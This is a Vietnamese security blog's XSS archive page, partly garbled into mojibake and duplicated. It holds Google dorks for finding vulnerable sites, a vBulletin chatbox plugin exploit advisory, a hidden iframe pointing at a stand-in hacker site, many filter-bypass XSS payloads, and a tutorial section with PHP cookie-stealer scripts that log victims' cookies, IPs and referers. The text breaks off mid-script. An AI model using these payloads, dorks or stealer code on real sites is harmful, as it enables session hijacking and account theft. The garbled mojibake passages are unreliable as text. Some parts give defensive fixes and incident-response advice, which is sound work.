Hiển thị các bài đăng có nhãn xss. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn xss. Hiển thị tất cả bài đăng

Chủ Nhật, 23 tháng 10, 2016

K?t h?p Open Redirect trong vi?c khai th�c l? h?ng b?o m?t

open-redirects-xss-tomasz
Ch��ng tr?nh Bug Bounty c?a Google (VRP) th�?ng xuy�n nh?n ��?c c�c b�o c�o l?i c� �? c?p t?i open redirect (chuy?n h�?ng m?). M?c d� b?n th�n ch�ng kh�ng ��?c xem x�t l� l? h?ng b?o m?t, ch�ng t�i nh?n ra r?ng open redirect c� th? ��?c s? d?ng �? khai th�c c�c l? h?ng kh�c nh� XSS ho?c OAuth Token Disclosure.
Read More

Thứ Năm, 6 tháng 10, 2016

C?nh b�o v? l? h?ng b?o m?t XSS ch�a ��?c v� trong WordPress

Theo ngu?n tin c?nh b�o t? group HVA th? WordPress �ang d�nh l? h?ng b?o m?t Stored XSS c?c k? nghi�m tr?ng t?i ph?n b?nh lu?n v� b�i vi?t (c? th? l� ? ti�u �? c?a b�i vi?t). T? �? x�c nh?n l?i b?ng c�ch ki?m th? v?i phi�n b?n WordPress 4.6.1 tr�n Localhost.

wordpress-security-xss-vulnerability
L? h?ng ?nh h�?ng t?i c�c phi�n b?n t? 4.6.1 tr? xu?ng (t?c l� bao g?m c? phi�n b?n m?i nh?t). Hi?n t?i ph�a WordPress ch�a c� b?n c?p nh?t n�o.

V?i hai l? h?ng XSS n�y, hacker ho�n to�n c� th? t?i web-shell l�n trang web c?a b?n. Xem video demo trong b�i vi?t n�y �? h?nh dung ��?c m?c �? nguy hi?m.
Read More

Thứ Ba, 30 tháng 8, 2016

L? h?ng b?o m?t Cross-Site-Scripting (XSS) c� g? nguy hi?m?

M?i khi ��ng nh?ng b�i writeup v? m?t l? h?ng XSS ��?c ph�t hi?n tr�n m?t trang web n�o ��, t�i bi?t s? c� nh?ng ng�?i nh?ch m�p c�?i kh?y v? l�c �� trong �?u h? s? ngh?:

  • "C�i l?i XSS n�y th? c� c�i qu�i g? nguy hi?m c� ch??"
  • "Ngo�i vi?c hi?n l�n m?t h?p tho?i th? XSS l�m ��?c c�i �?ch g? n?a kh�ng?"
  • "M?t l? h?ng v? v?n th�i m�. � m� hi?n h?p tho?i c?ng ��?c g?i l� l? h?ng h??"
  • ...

V?y th?, XSS c� g? nguy hi?m?



Thay v? vi?t ra �?ng l? thuy?t nh�m ch�n, ch�ng ta s? c�ng xem x�t nh?ng h?nh th?c t?n c�ng khai th�c XSS �? ��?c �p d?ng trong th?c ti?n. N�i tr�?c �? nh?ng b?n n�o c?n ch�a bi?t v? XSS th? n�n Google xem n� l� g? tr�?c khi �?c ti?p b�i vi?t n�y nha.
Read More

Thứ Tư, 24 tháng 8, 2016

T�i �? hack VietDesigner.net v� Kenhsinhvien.vn nh� th? n�o?

how-i-hacked-vietdesigner-and-kenhsinhvien

H�nh tr?nh truy t?m l? h?ng b?o m?t

Tr�?c h?t, t? xem x�t �?c �i?m chung c?a c? hai trang web n�y:

  1. ��y �?u l� 2 di?n ��n l?n (m?c ti�u c�ng l?n, c�ng nhi?u ng�?i d�ng th? c�ng t? l? thu?n v?i s? nguy hi?m c?a m?t l?i b?o m?t ��?c ph�t hi?n).
  2. C�ng s? d?ng n?n t?ng Xenforo.
  3. C�ng s? d?ng m?t add-on gi?ng nhau �? t?o tr?nh chuy?n h�?ng li�n k?t.

Trong 3 �?c �i?m n�y th? �i?u th? 3 ch�nh l� m?u ch?t:

  • http://kenhsinhvien.vn/redirect/?url=https://junookyo.blogspot.com/
  • http://forum.vietdesigner.net/redirect/?url=https://junookyo.blogspot.com/

T?i sao t? bi?t r?ng 2 trang c�ng d�ng m?t add-on? Ngo�i vi?c d?a theo c?u tr�c li�n k?t, th? t? xem m? ngu?n trang chuy?n h�?ng c?a c? 2 v� c�ng m?t th?y t? kh�a quan tr?ng sau:

hack-vietdesignernet-kenhsinhvienvn-xss-csrf


T?m t? kh�a �� tr�n Google:

hack-vietdesignernet-kenhsinhvienvn-xss-csrf

Nh� v?y c� th? �o�n ��?c 2 di?n ��n kia �ang s? d?ng add-on t?o tr?nh chuy?n h�?ng t�n l� "GoodForNothing Url Anonymizer" (sau n�y �? �?i t�n th�nh GoodForNothing Link Proxy).
Read More

Thứ Hai, 18 tháng 7, 2016

T�i �? hack phimmoi.net nh� th? n�o? - Ph?n 2

H�m nay v?a ��ng m?t tu?n t�nh t? ng�y t? hack phimmoi.net (24/06), ch? sau �� hai ng�y - 26/06, t? ti?p t?c ph�t hi?n ra 2 l? h?ng b?o m?t ti?p theo thu?c sub-domain c?a phimmoi.net

C�u chuy?n b?t �?u

Ng�y 26/06, trong l�c v�o xem phim t?i phimmoi, t? ch?t �? ? c�i banner qu?ng c�o ? c?t b�n ph?i. V? �ang s? d?ng uBlock n�n t? kh� ng?c nhi�n khi th?y v?n c� m?t banner hi?n th?.


T? li?n nh?n ph?i chu?t v�o banner v� sao ch�p li�n k?t:
http://uniad.phimmoi.net/publisher/go/?bannerid=673&zoneid=3&dtime=1467368202&ctype=CPD&domain=phimmoi.net&verify=fe8043c8f4e38373918ba129a804b5d4&href=http%3A%2F%2Fcuuam.360game.vn%2Fintro%2Fcackpg3%2Flanding%2Findex.html%3Futm_source%3DBanner%26utm_medium%3DPhimmoi.net%26utm_content%3DPhimmoi.net_PlayerPage_Right1_300x600
S? d?ng t�nh n�ng Split URL (ng?t c�c tham s?) v� URLdecode c?a Hackbar:
http://uniad.phimmoi.net/publisher/go/
?bannerid=673
&zoneid=3
&dtime=1467368202
&ctype=CPD
&domain=phimmoi.net
&verify=fe8043c8f4e38373918ba129a804b5d4
&href=http://cuuam.360game.vn/intro/cackpg3/landing/index.html?utm_source=Banner&utm_medium=Phimmoi.net&utm_content=Phimmoi.net_PlayerPage_Right1_300x600
V? l� URL c?a m?t banner qu?ng c�o n�n hi?n nhi�n ��y l� m?t tr?nh chuy?n h�?ng li�n k?t. Sau khi th?c hi?n ch�t nghi�n c?u nh?, t? ph�t hi?n ra trong c�c tham s? c?a URL th? ch? c� tham s? href l� b?t bu?c (required). Nh� v?y, t? ho�n to�n c� th? l?i d?ng tr?nh chuy?n h�?ng n�y �? tr? t? b?t c? li�n k?t n�o t? mu?n. V� d?:

http://uniad.phimmoi.net/publisher/go/?href=https://junookyo.blogspot.com
Read More

Thứ Bảy, 16 tháng 7, 2016

T�i �? hack trang SinhVienIT.net nh� th? n�o?

sinhvienit-net-xss-csrf-exploit

L? h?ng b?o m?t XSS tr�n sinhvienit.net

M?t ng�y �?p tr?i, t? l�n Google ki?m link t?i Visual Studio. Nh� th�?ng l?, SVIT (sinhvienit.net) v� VNZ (vn-zoom.com) lu�n �?ng top khi t?m ki?m m?y ph?n m?m... cr@ck. Kh?i ph?i suy ngh?, t? li?n nh?n v�o m?t link c� th? tin t�?ng (l� trang n�o th? c�c b?n c?ng bi?t r?i �?y, li�n quan t?i b�i vi?t m�).
Read More

Thứ Sáu, 24 tháng 6, 2016

T�i �? hack phimmoi.net nh� th? n�o?

1. Nghi ng? v? l? h?ng XSS tr�n phimmoi.net

phimmoi.net-xss-vulnerability
�ang ng?i code th? �ng anh g?i cho c�i link phim k�u v�o coi, ban �?u c?ng kh�ng mu?n coi ��u v? th?y IMDB th?p qu�. M� sau �ng ? g?i th�m c�i link Youtube n�y n?a n�n m?nh thay �?i ? �?nh li?n.
Read More

Thứ Sáu, 12 tháng 6, 2015

L? h?ng DOM XSS trong WordPress SEO by Yoast

WordPress SEO by Yoast - DOM XSS Vulderability
WordPress SEO by Yoast - DOM XSS Vulderability
M?t l? h?ng DOM XSS trong plugin WordPress SEO by Yoast �? ��?c b�o c�o 2 n�m tr�?c b?i m?t th�nh vi�n c� t�n t�i kho?n "badconker". T�c gi? c?a plugin n�i r?ng n� �? ��?c v� nh�ng nh� b?o m?t Charles Neill ph�t hi?n ra d�?ng nh� l? h?ng �? xu?t hi?n tr? l?i. N?u b?n �ang s? d?ng plugin n�y, t�i khuy�n b?n n�n c?p nh?t ngay l�n phi�n b?n m?i nh?t (2.2.1).
Read More

Thứ Hai, 2 tháng 3, 2015

Ph��ng ph�p ki?m tra l?i XSS

S? d?ng c�c dork sau �? t?m ki?m tr�n google
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
inurl:?keyword=
inurl:?search=?
Check l?i XSS

 �? check 1 site d�nh l?i xss, th�ng th�?ng ta th�m �o?n script sau
<script>alert(�XSS�)</script> 
 N?u th?y n� xu?t hi?n 1 khung th�ng b�o th? site �� �? d�nh l?i XSS v� attacker c� th? s? d?ng XSS �? chi?m quy?n �i?u khi?n hay th?c thi nh?ng m?c ��ch kh�c.


- Tuy nhi�n �?i v?i 1 s? site c?n ph?i bypass b? l?c khi th?c hi?n t?n c�ng b?ng XSS.
- Ngo�i c�c �o?n m? script attacker c?ng c� th? ch�n v�o c�c th? html nh� sau:
"><body bgcolor="FF0000"></body>
- S? d?ng c�c tool scan l?i site t?i ��y:  http://quylevhb.blogspot.com/search/label/Tools

Phương pháp kiểm tra lỗi XSS

Sử dụng các dork sau để tìm kiếm trên google
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
inurl:?keyword=
inurl:?search=​
Check lỗi XSS

 Để check 1 site dính lỗi xss, thông thường ta thêm đoạn script sau
<script>alert(“XSS”)</script> 
 Nếu thấy nó xuất hiện 1 khung thông báo thì site đó đã dính lỗi XSS và attacker có thể sử dụng XSS để chiếm quyền điều khiển hay thực thi những mục đích khác.


- Tuy nhiên đối với 1 số site cần phải bypass bộ lọc khi thực hiện tấn công bằng XSS.
- Ngoài các đoạn mã script attacker cũng có thể chèn vào các thẻ html như sau:
"><body bgcolor="FF0000"></body>
- Sử dụng các tool scan lỗi site tại đây:  http://quylevhb.blogspot.com/search/label/Tools

XSS c� b?n

XSS - Cross Site Scripting, tr�nh g?i t?t CSS tr�ng v?i Cascading Style Sheet. XSS l� l? h?ng c?a Web Application cho ph�p hacker ch?y client side scripts(�?c bi?t Javascript) c?a h? khi c� ng�?i kh�c truy c?p trang web.



Trong m?t cu?c t?n c�ng XSS �i?n h?nh, hacker s?  ��a m? javascript �?c h?i c?a m?nh v�o c�c trang web h?p ph�p. Khi ng�?i d�ng truy c?p v�o li�n k?t �?c bi?t c� ch?a ph?n m? �?c, trang web s? th?c hi?n c�c javascript �?c h?i ��. M?t l? h?ng XSS n?u khai th�c th�nh c�ng s? cho ph�p k? t?n c�ng  l?a �?o, �n c?p t�i kho?n v� th?m ch� l� c�i �?t worms.

V� d?: Ch�ng ta h?y t�?ng t�?ng, m?t hacker �? ph�t hi?n ra l? h?ng XSS trong Gmail v� ti�m script �?c h?i v�o. Khi ng�?i d�ng truy c?p v�o c�c trang web, n� s? th?c thi k?ch b?n �?c h?i. M? �?c n�y c� th? ��?c s? d?ng �? chuy?n h�?ng ng�?i d�ng �?n trang gmail gi? ho?c ��nh c?p cookie. S? d?ng cookie n�y b? ��nh c?p, �ng c� th? ��ng nh?p v�o t�i kho?n c?a b?n v� thay �?i m?t kh?u.
S? d? d�ng h�n �? t?m hi?u v? XSS n?u b?n c� kh? n�ng:

    - Gi?i v?  HTML,javascript(Xem th�m).
    - Bi?t v?  HTTP client-Server Architecure.(Xem th�m)
    - Bi?t th�m v? m?t v�i server side programming (php, asp, jsp).



Th?c h�nh XSS:

Hacker s? d�ng google dork �? t?m c�c site c� l?i h?ng XSS, b?ng c�c t? kh�a d?ng nh�: �?search=� hay �.php?q=�. S? c� r?t nhi?u k?t qu? �? h? l�m m?c ti�u v� th?c hi?n t?n c�ng.

C�c b?n c� th? t? vi?t �o?n m? nh� sau, l�u th�nh file php v� ch?y ? localhost �? test.

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>BASIC XSS TEST</title>
</head>
   
<body>
<form method="post" action="#">
<input type="text" name="query" value="" />
<input type="submit" value="GO" />
<br />

<?php echo $_POST['query']
   
;?>
</body>
</html>

B?t �?u khai th�c, th? nh?p 1 gi� tr? b?t k? v� nh?n n�t GO, trang s? hi?n k?t qu? ngay b�n d�?i.



Nh� �?nh ngh?a c?a XSS, v?y ta h?y th? nh?p v�o m?t �o?n m? javascript th? xem th? n�o. V� d?:
<script>alert('Quyle - VHB Group')</script>

 N?u website b? d�nh l? h?ng XSS, ch�ng ta s? c� k?t qu? nh� sau:


C�c ki?u XSS c� b?n: ��?c ph�n chia th�nh 2 lo?i, Non-Persistent XSS v� Persistent XSS

Persistent XSS: Ch? c�c cu?c t?n c�ng m� m? �?c ��?c ��a l�n v� l�u tr? trong database. N� ho?t �?ng m?i khi c� ng�?i truy c?p v�o trang th? hi?n m?. V� d?: Khi ��ng k? th�nh vi�n, ph?n gi?i thi?u v? b?n th�n, n?u hacker nh?p v�o m? XSS, v� website kh�ng ki?m tra k? d? li?u �?u v�o, th? m?i khi truy c?p trang th�nh vi�n c?a hacker ��, b?n s? b? khai th�c.

Non-Persistent XSS: Ch? c�c cu?c t?n c�ng t?c th?i, m? �?c ��?c g?n ngay tr�n URL, ho?c b?ng c�ch n�o �� m� kh�ng l�u tr? trong database. Ch? c� t�c d?ng duy nh?t m?t l?n.

XSS cơ bản

XSS - Cross Site Scripting, tránh gọi tắt CSS trùng với Cascading Style Sheet. XSS là lỗ hổng của Web Application cho phép hacker chạy client side scripts(đặc biệt Javascript) của họ khi có người khác truy cập trang web.



Trong một cuộc tấn công XSS điển hình, hacker sẽ  đưa mã javascript độc hại của mình vào các trang web hợp pháp. Khi người dùng truy cập vào liên kết đặc biệt có chứa phần mã độc, trang web sẽ thực hiện các javascript độc hại đó. Một lỗ hổng XSS nếu khai thác thành công sẽ cho phép kẻ tấn công  lừa đảo, ăn cắp tài khoản và thậm chí là cài đặt worms.

Ví dụ: Chúng ta hãy tưởng tượng, một hacker đã phát hiện ra lỗ hổng XSS trong Gmail và tiêm script độc hại vào. Khi người dùng truy cập vào các trang web, nó sẽ thực thi kịch bản độc hại. Mã độc này có thể được sử dụng để chuyển hướng người dùng đến trang gmail giả hoặc đánh cắp cookie. Sử dụng cookie này bị đánh cắp, ông có thể đăng nhập vào tài khoản của bạn và thay đổi mật khẩu.
Sẽ dễ dàng hơn để tìm hiểu về XSS nếu bạn có khả năng:

    - Giỏi về  HTML,javascript(Xem thêm).
    - Biết về  HTTP client-Server Architecure.(Xem thêm)
    - Biết thêm về một vài server side programming (php, asp, jsp).



Thực hành XSS:

Hacker sẽ dùng google dork để tìm các site có lỗi hổng XSS, bằng các từ khóa dạng như: “?search=” hay “.php?q=”. Sẽ có rất nhiều kết quả để họ làm mục tiêu và thực hiện tấn công.

Các bạn có thể tự viết đoạn mã như sau, lưu thành file php và chạy ở localhost để test.

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>BASIC XSS TEST</title>
</head>
   
<body>
<form method="post" action="#">
<input type="text" name="query" value="" />
<input type="submit" value="GO" />
<br />

<?php echo $_POST['query']
   
;?>
</body>
</html>

Bắt đầu khai thác, thử nhập 1 giá trị bất kỳ và nhấn nút GO, trang sẽ hiện kết quả ngay bên dưới.



Như định nghĩa của XSS, vậy ta hãy thử nhập vào một đoạn mã javascript thử xem thế nào. Ví dụ:
<script>alert('Quyle - VHB Group')</script>

 Nếu website bị dính lỗ hổng XSS, chúng ta sẽ có kết quả như sau:


Các kiểu XSS cơ bản: Được phân chia thành 2 loại, Non-Persistent XSS và Persistent XSS

Persistent XSS: Chỉ các cuộc tấn công mà mã độc được đưa lên và lưu trữ trong database. Nó hoạt động mọi khi có người truy cập vào trang thể hiện mã. Ví dụ: Khi đăng ký thành viên, phần giới thiệu về bản thân, nếu hacker nhập vào mã XSS, và website không kiểm tra kỹ dữ liệu đầu vào, thì mỗi khi truy cập trang thành viên của hacker đó, bạn sẽ bị khai thác.

Non-Persistent XSS: Chỉ các cuộc tấn công tức thời, mã độc được gắn ngay trên URL, hoặc bằng cách nào đó mà không lưu trữ trong database. Chỉ có tác dụng duy nhất một lần.

Thứ Sáu, 16 tháng 8, 2013

ChangUonDyU - Extra File Chatbox XSS vulnerability at Archive

# Exploit Title: ChangUonDyU - Extra File Chatbox XSS vulnerability at Archive
# Google Dork: intitle:"Tin nhắn lưu trữ" and inurl:archive.php?page=
# Date: 24/06/2013
# Exploit Author: Juno_okyo



# Vendor Homepage: http://hoiquantinhoc.com/
# Software Link: http://hoiquantinhoc.com/modificatio...x-3-6-0-a.html
# Version: 3.6.0 (may affect other versions)
# Tested on: vBulletin 3.8.7 (and affect other versions)
# CVE : http://www.vbulletin.com/
################################################## ################
Vulnerability:
################################################## ################
An input unfiltered help we can exploit an XSS vulnerability:
if ($_GET['page'])
{
$page = $_GET['page'];
}
else
{
$page = 1;
}

################################################## ################
Exploitation:
################################################## ################
We can inject script for a XSS attack:
archive.php?page=<script>alert("XSS was found!")</script>
archive.php?page=<script>location.href="http://junookyo.blogspot.com/"</script>




################################################## ################
How to fix:
################################################## ################
Edit archive.php file, we need filter to prevent script injection:
if ($_GET['page'])
{
$page = htmlentities(strip_tags($_GET['page']));
}
else
{
$page = 1;
}

################################################## ################
More details:
################################################## ################
Website: http://junookyo.blogspot.com/
About Exploit:
http://junookyo.blogspot.com/2013/06...atbox-xss.html

################################################## ################
Great thanks to J2TeaM (Juno_okyo, James, Neods, Killer, K-20 and all member)
################################################## ################

P/S: Demo: http://fusewireless.com/BYG/Chatbox/...9%3C/script%3E
IFrame Injection Attacks

IFrame Injection Attacks

Kỹ thuật tấn công theo kiểu IFrame Injection hiện vẫn đang là 1 dạng xâm nhập cơ bản và phổ biến nhất của mô hình Cross-Site Scripting – XSS. Bằng cách chèn vào các website động 


(ASP, PHP, CGI, JSP … ) những thẻ HTML hay những đoạn mã script nguy hiểm, trong đó những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML cơ bản. Nếu bạn phát hiện được có kẻ đang nhắm vào website của bạn bằng kỹ thuật này, không nên quá lo lắng. Sau đây là 1 số thao tác cần làm khi website lâm vào tình trạng này.
Ví dụ 1 đoạn mã độc hại thường được sử dụng để tấn công:

{xtypo_code}
<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
nội dung của đoạn mã độc
{/xtypo_code}


1. Thường xuyên bảo trì website trong 1 khoảng thời gian nhất định:

Các chuyên gia bảo mật khuyến cáo những người quản trị nên gỡ bỏ toàn bộ website xuống để tránh trường hợp trở thành tâm điểm phát tán mã độc. Và trong toàn bộ quá trình khắc phục, tiếp tục giữ tình trạng offline của website.

2. Thay đổi lại tất cả các mật khẩu:
Thoạt nghe có vẻ đơn giản, nhưng rất nhiều người quản trị hình như không mấy để ý đến khâu cực kỳ quan trọng này. Sau khi bị tin tặc nhòm ngó, bạn nên đổi mới tất cả mật khẩu bao gồm tài khoản ftp, ssh, các tài khoản quản trị, cơ sở dữ liệu …

3. Lưu lại 1 bản của website để phân tích:

Để xác định rõ nguyên nhân và điểm yếu nào đã bị tin tặc khai thác, bạn cần lưu giữ lại 1 bản nguyên tình trạng lúc bị tấn công. Điều này rất có ích cho việc phân tích và ngăn chặn hiểm họa sau này, bạn nên lưu lại website dưới dạng file nén định dạng rar, zip hoặc gzip và lưu trữ tại 1 nơi an toàn. Lưu ý rằng không bao giờ được lưu file cách ly này trực tiếp trên server.

4. Thay thế toàn bộ website bằng 1 bản sao lưu hoàn toàn sạch sẽ:

Không nên quá dựa vào những nhà cung cấp dịch vụ host rằng họ sẽ sao lưu toàn bộ dữ liệu cho bạn. Rất nhiều bộ phận hỗ trợ kỹ thuật thường xuyên khẳng định rằng họ có tiến hánh sao lưu tự động theo lịch trình, nhưng không gì có thể chắc chắn bằng việc bạn tự làm, hơn nữa 2 phương án dự phòng bao giờ cũng tốt hơn 1 phương án.

5. Kiểm tra lại website và đăng tải trở lại:

Quá trình này nên tiến hành chu đáo để đảm bảo rằng toàn bộ website an toàn và không còn lỗi nữa, sau đó bạn có thể đăng tải website trở lại như trước.

6. Tìm hiểu về nguồn gốc của các cuộc tấn công:

Để đảm bảo rằng những cuộc tấn công sẽ không bao giờ lặp lại, những người quản trị nên tiến hành 1 cuộc kiểm tra, phân tích đầy đủ và chi tiết của cuộc tấn công đó. Do lỗi ở đâu ? Lỗ hổng an ninh hay ứng dụng web ? Hoặc do chế độ phân quyền bị sai lệnh, nhầm lẫn ? Có thể website bị nhiêm virus trực tiếp ngay từ server lưu trữ dữ liệu ? Tất cả đều phải được tìm hiểu và phân tích kỹ lưỡng. Nếu cần thiết, hãy nhờ đến chuyên gia an ninh của các hãng bảo mật hàng đầu thế giới như Kaspersky, BitDefender, Norton, Panda, Avira …

7. Áp dụng các biện pháp bảo mật phù hợp:

Mặc dù bạn đã khôi phục thành công website, nhưng không có gì đảm bảo chắc chắn rằng website của bạn sẽ không bị tấn công thêm lần nào nữa. Nếu lỗ hổng an ninh cũ chưa được khắc phục, có thể website của bạn lại bị tê liệt ngay trong tối nay. Dựa vào các kết quả phân tích thu được ở bước trên, bạn nên áp dụng các biện pháp an ninh phù hợp, nâng cấp server, cài đặt thêm chương trình bảo mật, nâng cấp toàn bộ ứng dụng web hoặc tiến hành sử dụng quy luật bảo mật hoàn toàn mới.

Dựa vào kinh nghiệm quản lý và thông tin thu thập, chúng tôi có thể đóng góp thêm 1 số lời khuyên và dự đoán khách quan về nguyên nhân như sau. 

Các nguyên nhân dễ gặp phải:
- Website sử dụng dịch vụ host giá rẻ
- Dựa trên nền tảng phiên bản cũ của các ứng dụng mã nguồn mở, ví dụ như WordPress 1.0… vốn có khá nhiều lỗ hổng
- Quyền truy cập dữ liệu trên server được thiết lập không theo thứ tự nhất định, ví dụ quyền thao tác với dữ liệu ở mức 777 – đọc, ghi và thực thi
- Các thiếu sót của phần mềm ứng dụng
- Sử dụng FTP thay vì SFTP 
- Không hạn chế IP đối với các tài khoản SSH và FTP

Một số thao tác đơn giản nhưng hữu ích:
- Thay đổi mật khẩu định kỳ, ví dụ 2 tuần hoặc 4 tuần 1 lần
- Luôn cập nhật các phiên bản ổn định của ứng dụng
- Thường xuyên “dọn dẹp” các thư mục chứa dữ liệu trên server, để ý nếu có những file lạ đột nhiên xuất hiện
- Các mức phân quyền được thiết lập chuẩn xác
- Thường xuyên trao đổi với các đơn vị, chuyên gia cung cấp dịch vụ bảo mật để nhận được lời khuyên tốt nhất.

T.Anh (theo ComputerUser)

Thứ Tư, 13 tháng 3, 2013

[Bài 3 - XSS] Kỹ thuật Bypass và phương pháp tấn công XSS

Trong bài trước http://vhbsystem.net/@4rum/showthrea...ra-l%E1%BB%97i Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS



7. Kỹ Thuật Bypass

1 số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:



"><script>alert("Check By Soleil")</script>


"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 8 3, 111, 108, 101, 105, 108)) </script>


'><script>alert("Check By Soleil ")</script>


'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>

<ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>


<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>


"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>


"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>


'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>


'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>


</script><script>alert("Check By Soleil ")</script>


</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>


"/><script>alert("Check By Soleil ")</script>


"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>


'/><script>alert("Check By Soleil ")</script>


'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>


</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>


</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))


</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>


</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>

</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67,10 4,101,99,107,32,66,121,32,83,111,108,101,105,108,4 5,86,72,66,32,89,104,58,100,117,99,100,117,110,103 ,46,48,56,99,108,99 ))</SCRIPT>


";alert("Check By Soleil ");"


";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"


';alert("Check By Soleil ");'


';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'


";alert("Check By Soleil ")


";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
';alert("Check By Soleil ")


';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
Trong đó: 67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By Soleil” ở dạng char.

Ví dụ:

- Attacker có thể chèn vào thanh tìm kiếm site http://www.hanoi.gov.vn đoạn mã script đã bypass sau:

<SCRIPT>alert(String.fromCharCode(67,104,101,99,10 7,32,66,121,32,83,111,108,101,105,108,45,86,72,66, 32,89,104,58,100,117,99,100,117,110,103,46,48,56,9 9,108,99 ))</SCRIPT>


Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.




- http://m.aol.com/yp/search?query=Bars"><script>alert(/Check By Mr.Soleil VHB_Group/)</script>

8. Quá trình các bước thực hiện tấn công bằng XSS

Bước 1: Tạo file Stealer.php để đánh cắp cookies

Nội dung của file Stealer.php như sau:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("logs.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

- $cookie = $HTTP_GET_VARS["cookie"]; // đánh cắp cookie từ địa chỉ hiện tại url(stealer.php?cookie=x) và lưu trữ cookie trong biến $cookie

- $steal = fopen("cookiefile.txt", "a"); // Mở cookiefile để đính kèm các cookie được đánh cắp

- fwrite($steal, $cookie ."\\n"); // Lưu lại những cookie được đánh cắp bên trong file

- fclose($steal); // Đóng lại cookiefile
File này có nhiệm vụ đánh cắp cookies của victim và ghi thông tin lên file logs.txt

Bước 2: Up các file lên host

UP lên host 2 file Stealer.php và logs.txt. Trong đó file Stealer.php có nội dung như trên và file logs.txt là file rỗng để lưu trữ toàn bộ thông tin của victim được gửi về thông qua mệnh lệnh được đưa ra từ file Stealer.php.

Lưu ý, phải chmod file log.txt về 777.

Ngoài ra có thể sử dụng các đoạn mã sau có thêm nhiều nhiệm vụ hơn cho file stealer.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: <ENTER WEBSITE HERE>");
?>

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
